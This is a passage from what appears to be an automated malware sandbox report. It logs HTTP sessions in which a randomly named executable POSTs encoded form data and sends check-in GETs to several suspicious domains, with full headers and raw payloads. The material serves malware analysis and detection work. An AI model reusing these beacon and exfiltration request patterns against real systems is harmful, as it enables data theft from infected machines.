                                                                        Data Raw: 39 42 5f 70 70 74 3d 71 61 6a 77 2f 59 47 4d 51 6f 45 71 31 69 39 73 73 6f 41 6c 77 45 6c 38 4e 66 30 71 36 6f 44 45 51 76 78 52 4b 51 52 73 42 50 6f 34 62 77 63 58 36 4e 77 64 6b 2f 70 78 32 42 78 4d 78 5a 63 35 56 56 63 72 43 32 44 50 7a 75 45 54 53 6b 68 66 6d 65 35 52 74 57 6b 71 50 32 66 42 55 49 47 50 71 66 4a 71 6d 38 79 69 71 55 30 6d 6a 33 57 5a 74 39 6a 55 52 46 48 35 30 4a 38 45 39 63 4e 69 79 50 4a 77 6c 73 52 6a 77 4e 4f 76 63 76 42 68 4d 30 31 64 54 45 48 58 32 5a 6a 64 75 74 42 63 66 47 75 4f 67 33 62 35 46 32 31 56 32 39 41 30 36 64 59 4e 5a 76 73 77 48 2f 52 53 4a 62 78 74 50 77 3d 3d
                                                                        Data Ascii: 9B_ppt=qajw/YGMQoEq1i9ssoAlwEl8Nf0q6oDEQvxRKQRsBPo4bwcX6Nwdk/px2BxMxZc5VVcrC2DPzuETSkhfme5RtWkqP2fBUIGPqfJqm8yiqU0mj3WZt9jURFH50J8E9cNiyPJwlsRjwNOvcvBhM01dTEHX2ZjdutBcfGuOg3b5F21V29A06dYNZvswH/RSJbxtPw==


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16 | 192.168.2.4 | 49953 | 104.21.74.79 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:36.613003969 CET | 784 | OUT | POST /irzc/ HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tenmyk.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.tenmyk.shop/irzc/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 71 61 6a 77 2f 59 47 4d 51 6f 45 71 31 42 56 73 67 76 55 6c 68 30 6c 7a 42 2f 30 71 76 34 44 49 51 76 74 52 4b 54 63 33 43 39 38 34 61 55 59 58 37 4a 6b 64 6c 2f 70 78 35 68 78 4a 37 35 63 77 56 56 67 6a 43 32 76 50 7a 75 51 54 53 6c 52 66 68 74 42 53 73 47 6b 73 57 6d 66 44 61 6f 47 50 71 66 4a 71 6d 34 62 33 71 55 38 6d 67 45 4f 5a 76 5a 33 54 64 6c 48 34 67 5a 38 45 35 63 4e 6d 79 50 49 4b 6c 6f 51 32 77 4f 32 76 63 75 78 68 4d 6c 31 61 64 45 48 52 6f 70 69 49 34 75 45 74 59 33 66 6a 68 68 48 69 59 31 64 71 33 37 4e 75 72 73 35 61 4c 76 49 44 61 34 59 6d 45 59 4d 6b 55 33 6d 4a 6f 74 4a 37 7a 42 31 6c 63 4e 39 32 38 79 5a 66 43 68 6f 3d
                                                                        Data Ascii: 9B_ppt=qajw/YGMQoEq1BVsgvUlh0lzB/0qv4DIQvtRKTc3C984aUYX7Jkdl/px5hxJ75cwVVgjC2vPzuQTSlRfhtBSsGksWmfDaoGPqfJqm4b3qU8mgEOZvZ3TdlH4gZ8E5cNmyPIKloQ2wO2vcuxhMl1adEHRopiI4uEtY3fjhhHiY1dq37Nurs5aLvIDa4YmEYMkU3mJotJ7zB1lcN928yZfCho=


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        17 | 192.168.2.4 | 49959 | 104.21.74.79 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:39.273969889 CET | 10866 | OUT | POST /irzc/ HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tenmyk.shop
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.tenmyk.shop/irzc/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 71 61 6a 77 2f 59 47 4d 51 6f 45 71 31 42 56 73 67 76 55 6c 68 30 6c 7a 42 2f 30 71 76 34 44 49 51 76 74 52 4b 54 63 33 43 39 6b 34 61 68 4d 58 36 72 4d 64 2f 2f 70 78 6e 52 78 49 37 35 64 67 56 52 4d 6e 43 32 79 74 7a 73 6f 54 55 47 4a 66 67 59 74 53 6e 47 6b 73 4c 32 66 47 55 49 48 48 71 66 35 75 6d 38 48 33 71 55 38 6d 67 46 2b 5a 68 64 6a 54 66 6c 48 35 30 4a 38 49 39 63 4e 43 79 50 77 77 6c 6f 64 4e 33 2b 57 76 64 4f 68 68 4c 58 64 61 52 45 48 54 70 70 6a 4c 34 70 4d 32 59 7a 48 42 68 68 62 63 59 32 42 71 30 38 51 73 2f 59 4e 6d 59 4e 45 68 50 59 73 63 4e 6f 55 6b 52 32 61 46 35 64 4a 55 7a 54 70 76 65 61 51 65 35 32 6c 62 64 46 6b 71 48 68 45 48 6c 32 6c 74 73 4e 76 2f 77 33 42 76 47 69 64 55 57 76 35 34 45 4c 70 68 34 30 74 51 77 46 4f 67 61 7a 74 71 4e 6f 70 7a 55 48 35 62 6e 33 69 46 6f 6c 75 46 36 63 68 77 4c 42 5a 6b 6c 37 78 57 4c 59 6a 34 74 6f 59 36 75 6e 4d 63 2f 63 47 4d 53 79 51 47 73 64 6e 56 35 4e 36 53 64 62 36 4a 76 44 76 44 66 43 47 33 50 6f 68 45 4b 43 4b [TRUNCATED]
                                                                        Data Ascii: 9B_ppt= [TRUNCATED]


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        18 | 192.168.2.4 | 49965 | 104.21.74.79 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:41.928286076 CET | 510 | OUT | GET /irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0cyyooyzOVigyhm4upFaEQ5FVDL9IYlN2EnnOtWol53ChrSdq3Cue46r4D6qSkCmEW9rZbuVVo= HTTP/1.1
                                                                        Host: www.tenmyk.shop
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:08:43.766669035 CET | 1236 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Fri, 13 Dec 2024 12:08:43 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                        cache-control: no-cache, must-revalidate, max-age=0
                                                                        x-redirect-by: WordPress
                                                                        location: https://tenmyk.shop/irzc/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=nYLQ8syZYIEqykNPtdlYwElZKL5y37q0UOpjKQ4AHu5ne0cyyooyzOVigyhm4upFaEQ5FVDL9IYlN2EnnOtWol53ChrSdq3Cue46r4D6qSkCmEW9rZbuVVo=
                                                                        x-litespeed-cache-control: public,max-age=3600
                                                                        x-litespeed-tag: 3d9_HTTP.404,3d9_HTTP.301,3d9_404,3d9_URL.63e80ca7b6af420a78c880ebcf9fe9a1,3d9_
                                                                        x-litespeed-cache: miss
                                                                        CF-Cache-Status: DYNAMIC
                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1s817q3bM4qCtdZ%2BqrIrzcFvAjzPjeIQ6a4yPEO4egRbyf1kgrjGPJdkt%2BvGseqlbrUo3E39EuDZjwmx%2BIU6CUul5geR1owNp0ZJ%2BESYSRww5QhMlGP%2B2xXiZ79MqKTZm%2F4%3D"}],"group":"cf-nel","max_age":604800}
                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                        Server: cloudflare
                                                                        CF-RAY: 8f15d753cb92436d-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1849&min_rtt=1849&rtt_var=924&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=510&delivery_rate=0&cwnd=160&unsent_bytes
                                                                        Data Raw:
                                                                        Data Ascii:
                                                                        Dec 13, 2024 13:08:43.766716003 CET | 41 | IN | Data Raw: 30 26 63 69 64 3d 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 26 74 73 3d 30 26 78 3d 30 22 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 0&cid=0000000000000000&ts=0&x=0"0


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        19 | 192.168.2.4 | 49984 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:49.617727041 CET | 767 | OUT | POST /fhx4/ HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tlcatlas.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.tlcatlas.xyz/fhx4/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 47 59 65 51 2f 32 47 36 32 74 63 36 59 4e 6c 54 71 63 42 79 63 49 71 62 6a 55 2f 6d 7a 6d 2f 6f 35 68 42 35 6f 78 30 2f 43 4a 6e 49 7a 79 72 63 55 4a 70 41 63 4d 71 4f 68 31 6a 73 65 4b 77 67 58 6b 6f 58 57 66 36 31 4a 78 49 6b 52 54 2b 77 63 7a 6d 41 66 52 4c 53 48 41 75 4e 38 2b 43 75 38 50 71 4e 42 6b 50 72 6b 34 4e 4a 35 4a 4b 4b 63 78 61 6b 30 62 45 49 74 52 49 59 62 4d 45 56 5a 6e 4d 34 72 48 34 41 39 51 4e 47 46 42 30 63 51 63 78 4c 32 4b 66 72 67 50 33 78 41 58 6d 63 6f 69 45 44 51 31 68 44 76 38 68 69 2b 54 57 56 49 51 70 2f 61 59 49 47 6a 77 52 56 71 4c 52 39 4b 77 3d 3d
                                                                        Data Ascii: 9B_ppt=GYeQ/2G62tc6YNlTqcBycIqbjU/mzm/o5hB5ox0/CJnIzyrcUJpAcMqOh1jseKwgXkoXWf61JxIkRT+wczmAfRLSHAuN8+Cu8PqNBkPrk4NJ5JKKcxak0bEItRIYbMEVZnM4rH4A9QNGFB0cQcxL2KfrgP3xAXmcoiEDQ1hDv8hi+TWVIQp/aYIGjwRVqLR9Kw==
                                                                        Dec 13, 2024 13:08:50.697571993 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        20 | 192.168.2.4 | 49992 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:52.276360035 CET | 787 | OUT | POST /fhx4/ HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tlcatlas.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.tlcatlas.xyz/fhx4/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 47 59 65 51 2f 32 47 36 32 74 63 36 59 74 31 54 74 4c 31 79 51 34 72 70 39 6b 2f 6d 36 47 2f 73 35 68 46 35 6f 30 45 76 43 36 50 49 7a 58 48 63 47 59 70 41 5a 4d 71 4f 75 56 6a 6c 44 61 77 72 58 6b 6b 35 57 65 47 31 4a 78 63 6b 52 53 75 77 66 41 4f 44 65 42 4c 71 53 51 75 31 7a 65 43 75 38 50 71 4e 42 6b 61 4f 6b 34 46 4a 36 35 61 4b 54 30 75 6e 39 37 45 4c 37 68 49 59 66 4d 45 4a 5a 6e 4e 64 72 47 6c 62 39 56 4a 47 46 42 6b 63 58 49 64 4b 39 4b 66 70 76 76 32 47 50 48 36 58 6d 58 38 50 52 6d 42 35 78 2f 35 38 79 31 62 50 5a 68 49 6f 49 59 73 31 2b 33 59 68 6e 49 73 30 52 31 64 72 5a 51 5a 38 79 39 71 49 5a 45 52 4f 70 76 35 6f 6e 44 77 3d
                                                                        Data Ascii: 9B_ppt=GYeQ/2G62tc6Yt1TtL1yQ4rp9k/m6G/s5hF5o0EvC6PIzXHcGYpAZMqOuVjlDawrXkk5WeG1JxckRSuwfAODeBLqSQu1zeCu8PqNBkaOk4FJ65aKT0un97EL7hIYfMEJZnNdrGlb9VJGFBkcXIdK9Kfpvv2GPH6XmX8PRmB5x/58y1bPZhIoIYs1+3YhnIs0R1drZQZ8y9qIZEROpv5onDw=
                                                                        Dec 13, 2024 13:08:53.357635021 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        21 | 192.168.2.4 | 49998 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:54.931969881 CET | 10869 | OUT | POST /fhx4/ HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.tlcatlas.xyz
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.tlcatlas.xyz/fhx4/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Raw: 39 42 5f 70 70 74 3d 47 59 65 51 2f 32 47 36 32 74 63 36 59 74 31 54 74 4c 31 79 51 34 72 70 39 6b 2f 6d 36 47 2f 73 35 68 46 35 6f 30 45 76 43 36 58 49 7a 42 54 63 55 72 42 41 65 4d 71 4f 6e 31 6a 67 44 61 77 79 58 67 41 39 57 65 4c 58 4a 79 6b 6b 4c 77 32 77 65 78 4f 44 52 42 4c 71 51 51 75 4f 38 2b 44 6d 38 50 61 4a 42 6b 4b 4f 6b 34 46 4a 36 36 79 4b 61 42 61 6e 37 37 45 49 74 52 49 75 62 4d 45 31 5a 6e 31 6e 72 47 67 75 38 6d 78 47 46 68 55 63 52 37 6c 4b 2f 71 66 76 6f 76 32 65 50 48 33 50 6d 58 4a 38 52 6e 6c 54 78 35 46 38 69 53 4b 6e 43 53 49 31 51 2b 45 61 75 6c 4d 61 6a 70 63 31 57 43 45 54 56 69 42 42 6f 4f 4f 38 62 48 77 66 74 63 55 70 31 47 45 71 65 30 30 50 68 41 30 78 39 2f 34 6b 58 32 74 52 6d 42 68 68 6c 58 2b 4f 32 77 4f 48 55 77 47 35 4d 6c 48 77 33 68 6d 47 6f 6b 68 59 6f 45 79 6e 59 61 77 6c 43 42 4f 58 38 6a 6a 32 44 45 69 6e 6a 34 6b 34 74 47 62 76 62 52 35 77 65 45 2b 68 47 4a 41 64 34 36 6c 5a 62 53 55 4e 37 77 5a 53 34 6d 58 64 7a 44 45 55 2b 64 34 42 4f 68 6c 70 4a 76 38 [TRUNCATED]
                                                                        Data Ascii: 9B_ppt= [TRUNCATED]
                                                                        Dec 13, 2024 13:08:56.035886049 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                        22 | 192.168.2.4 | 50004 | 3.33.130.190 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        Dec 13, 2024 13:08:57.590099096 CET | 511 | OUT | GET /fhx4/?9B_ppt=La2w8Dit9+06W6UDzOpyWaSJwhDt0En/zF10s3Y0GLWWp3W5XYBJe4ay5kbJYoMqdVQ5UuPTPFY7LReVYSqnXR+zSVGbwszjyZbrKje2k/1r3Ly4XgGf/cA=&Sbv8I=RfPDYvIHtJXp8 HTTP/1.1
                                                                        Host: www.tlcatlas.xyz
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Dec 13, 2024 13:08:58.686669111 CET | 383 | IN | HTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Fri, 13 Dec 2024 12:08:58 GMT
                                                                        content-length: 262
                                                                        connection: close
                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 39 42 5f 70 70 74 3d 4c 61 32 77 38 44 69 74 39 2b 30 36 57 36 55 44 7a 4f 70 79 57 61 53 4a 77 68 44 74 30 45 6e 2f 7a 46 31 30 73 33 59 30 47 4c 57 57 70 33 57 35 58 59 42 4a 65 34 61 79 35 6b 62 4a 59 6f 4d 71 64 56 51 35 55 75 50 54 50 46 59 37 4c 52 65 56 59 53 71 6e 58 52 2b 7a 53 56 47 62 77 73 7a 6a 79 5a 62 72 4b 6a 65 32 6b 2f 31 72 33 4c 79 34 58 67 47 66 2f 63 41 3d 26 53 62 76 38 49 3d 52 66 50 44 59 76 49 48 74 4a 58 70 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?9B_ppt=La2w8Dit9+06W6UDzOpyWaSJwhDt0En/zF10s3Y0GLWWp3W5XYBJe4ay5kbJYoMqdVQ5UuPTPFY7LReVYSqnXR+zSVGbwszjyZbrKje2k/1r3Ly4XgGf/cA=&Sbv8I=RfPDYvIHtJXp8"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.4 | 50020 | 13.248.169.48 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:04.211534023 CET | 761 | OUT | POST /i7vz/ HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.xphone.net
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.xphone.net/i7vz/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=ZqfVjBlhuqPc5VTGjHSXLEBKlni/JLNtxfqJM5OkOlC5CsDiuaWCMWXVcV3DKKAZ5OnBDhaZghwxK3rml3Z7h9mlaQJWjT1VhF17ASgdQQnPzMezu9OiFjKaiy5/e/Fm4x+b94AkDoPAczt+TFF7ClF4bVkT921yboPxxnFlMgHv34Jw6QGpyQhD4eMRRMbZSg==
Dec 13, 2024 13:09:05.300121069 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                        content-length: 0
                                                                        connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50027 | 13.248.169.48 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:06.868469000 CET | 781 | OUT | POST /i7vz/ HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.xphone.net
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 223
                                                                        Referer: http://www.xphone.net/i7vz/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=ZqfVjBlhuqPc71DGkgOXAEBF73i/CrMmxfmJM460OTa5bNziteCCLWXVTF3GEqAS5JvzDlGZghkxK3bmmEwJgtmdWwJYnT1VhF17AS07QQ/Pz/2zucOlbzKZ0i5/JvFi4x+199ZBDr3Ac3p+d0F8Y1F6Ylla4HZ5d6um3BV0DB387eEqrhn+gQFwlZFlcPmQJhoVT01Da5eL//Hfmpm7XGE=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50028 | 13.248.169.48 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:09.526329994 CET | 10863 | OUT | POST /i7vz/ HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.xphone.net
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 10303
                                                                        Referer: http://www.xphone.net/i7vz/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Data Ascii: 9B_ppt= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.4 | 50029 | 13.248.169.48 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:12.176275015 CET | 509 | OUT | GET /i7vz/?Sbv8I=RfPDYvIHtJXp8&9B_ppt=Uo31g2cBlJ7Y51X9qiyWPllw2i3mGNMb8MW7X7OuPhPba7zW9vHCK1/tPALhEq4c3dLOMnOYn0E6ZXOZtUsElcj8T2RWijJqpTgaIG46XXD/8sezv8KfXnc= HTTP/1.1
                                                                        Host: www.xphone.net
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Language: en-us
                                                                        Connection: close
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
Dec 13, 2024 13:09:16.285753965 CET | 383 | IN | HTTP/1.1 200 OK
                                                                        content-type: text/html
                                                                        date: Fri, 13 Dec 2024 12:09:16 GMT
                                                                        content-length: 262
                                                                        connection: close
                                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Sbv8I=RfPDYvIHtJXp8&9B_ppt=Uo31g2cBlJ7Y51X9qiyWPllw2i3mGNMb8MW7X7OuPhPba7zW9vHCK1/tPALhEq4c3dLOMnOYn0E6ZXOZtUsElcj8T2RWijJqpTgaIG46XXD/8sezv8KfXnc="}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.4 | 50030 | 144.76.190.39 | 80 | 5580 | C:\Program Files (x86)\GIWqUxABuwNFMqIjPARSMYHwWWpBRzkzeqHfVMDnlefWQFrmKIAqDhcRVgrtQhj\oCCZhsVsNwIIN.exe
Timestamp | Bytes transferred | Direction | Data
Dec 13, 2024 13:09:22.270004034 CET | 788 | OUT | POST /r67x/ HTTP/1.1
                                                                        Host: www.basicreviews.online
                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                        Accept-Encoding: gzip, deflate
                                                                        Accept-Language: en-us
                                                                        Origin: http://www.basicreviews.online
                                                                        Cache-Control: no-cache
                                                                        Content-Type: application/x-www-form-urlencoded
                                                                        Connection: close
                                                                        Content-Length: 203
                                                                        Referer: http://www.basicreviews.online/r67x/
                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2)
                                                                        Data Ascii: 9B_ppt=4EttVWIf0lcP6zWnHxa7ZYxtmFdphT0A0iM3q+f6uZpYP9RonGi5k8W2SOaP07c3DsguNypZS66HuFUNYk/eN0SmoF0mI2Hs30mlAS9bmw5JVMi0jyIsJuOk6DJsHaOMNFCEU2/3zvFIhlmsfL3BS8UExw2ZuCK0H45Y3iNcAuj1YW7Wr81L7I+7mxegQlFweQ==
Dec 13, 2024 13:09:23.555135012 CET | 1045 | IN | HTTP/1.1 302 Found
                                                                        Connection: close
                                                                        content-type: text/html
                                                                        content-length: 771
